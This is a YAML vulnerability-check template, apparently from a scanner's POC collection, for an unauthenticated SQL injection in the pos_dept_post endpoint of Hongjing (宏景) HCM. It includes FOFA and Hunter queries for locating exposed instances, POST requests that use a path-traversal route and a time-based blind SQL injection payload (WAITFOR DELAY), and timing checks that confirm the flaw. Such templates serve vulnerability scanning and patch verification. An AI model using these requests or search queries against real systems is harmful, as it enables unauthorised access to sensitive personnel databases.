product: 宏景HCM管理系统
vName: 宏景HCM pos_dept_post接口SQL注入漏洞
type: SQL注入
vID: [ ]
level: 3
vDesc: 宏景HCM pos_dept_post对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，未授权的攻击者可获取数据库敏感信息。
version: ''
note: ''
search:
  FOFA: app="HJSOFT-HCM"
  Hunter: app.name="宏景 HCM"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /templates/attestation/../../pos/roleinfo/pos_dept_post
      data: usertable=h00&usernumber=1&i9999=-1';WAITFOR DELAY '0:0:5'+--
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: ">="
            num: 5
  - exp:
      method: post
      follow: false
      path: /templates/attestation/../../pos/roleinfo/pos_dept_post
      data: usertable=h00&usernumber=1&i9999=-1';WAITFOR DELAY '0:0:0'+--
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: "<="
            num: 3